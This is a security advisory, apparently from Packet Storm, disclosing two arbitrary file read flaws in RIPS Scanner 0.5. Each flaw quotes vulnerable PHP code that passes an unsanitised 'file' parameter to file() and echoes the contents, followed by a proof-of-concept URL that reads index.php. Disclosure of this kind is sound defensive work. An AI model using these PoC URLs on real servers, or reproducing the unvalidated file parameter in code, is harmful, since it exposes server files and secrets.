Rips Scanner 0.5 Local File Inclusion

2015-12-24T00:00:00
ID PACKETSTORM:135065
Type packetstorm
Reporter Ehsan Hosseini
Modified 2015-12-24T00:00:00

Description

                                        
                                            `================================================================================  
# Rips Scanner 0.5 - Local File Inclusion  
================================================================================  
# Vendor Homepage: https://github.com/robocoder/rips-scanner  
# Date: 24/12/2015  
# Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip  
# Version : 0.5  
# Author: Ashiyane Digital Security Team  
# Contact: hehsan979@gmail.com  
# Source: http://ehsansec.ir/advisories/rips-lfi.txt  
================================================================================  
# Vulnerable File : function.php  
  
# Vulnerable Code:  
  
58 $file = $_GET['file'];  
59 $start = (int)$_GET['start'];  
60 $end = (int)$_GET['end'];  
61 $ext = '.'.pathinfo($file, PATHINFO_EXTENSION);  
62  
63  
64 if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))  
65 {  
66 $lines = file($file);  
67   
68 if( isset($lines[$start]) && isset($lines[$end]) )  
69 {  
70 for($i=$start; $i<=$end; $i++)  
71 {  
72 echo highlightline($lines[$i], $i);  
73 }  
74 } else  
75 {  
76 echo '<tr><td>Sorry, wrong file referenced.</td></tr>';  
77 }  
78 } else  
79 {  
80 echo '<tr><td>Sorry, no file referenced.</td></tr>';  
81 }  
  
  
# PoC :  
  
http://localhost/rips/windows/function.php?file=/var/www/html/index.php&start=1&end=20  
  
Parmetrs :  
file = path/file  
start = 0  
end = number of page's lines  
  
================================================================================  
# Discovered By : Ehsan Hosseini (EhsanSec.ir)  
================================================================================  
  
  
------  
  
  
================================================================================  
# Rips Scanner 0.5 - (code.php) Local File Inclusion  
================================================================================  
# Vendor Homepage: https://github.com/robocoder/rips-scanner  
# Date: 24/12/2015  
# Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip  
# Version : 0.5  
# Author: Ashiyane Digital Security Team  
# Contact: hehsan979@gmail.com  
# Source: http://ehsansec.ir/advisories/rips-code-lfi.txt  
================================================================================  
# Vulnerable File : code.php  
  
# Vulnerable Code:  
  
  
102 $file = $_GET['file'];  
103 $marklines = explode(',', $_GET['lines']);  
104 $ext = '.'.pathinfo($file, PATHINFO_EXTENSION);  
105  
106   
107 if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))  
108 {  
109 $lines = file($file);  
110   
111 // place line numbers in extra table for more elegant copy/paste  
without line numbers  
112 echo '<tr><td><table>';  
113 for($i=1, $max=count($lines); $i<=$max;$i++)  
114 echo "<tr><td class=\"linenrcolumn\"><span  
class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>';  
115 echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';  
116   
117 $in_comment = false;  
118 for($i=0; $i<$max; $i++)  
119 {   
120 $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);  
121 }  
122 } else  
123 {  
124 echo '<tr><td>Invalid file specified.</td></tr>';  
125 }  
  
  
# PoC :  
  
http://localhost/rips/windows/code.php?file=/var/www/html/index.php  
  
Vulnerable Parameter : file  
  
================================================================================  
# Discovered By : Ehsan Hosseini (EhsanSec.ir)  
================================================================================  
`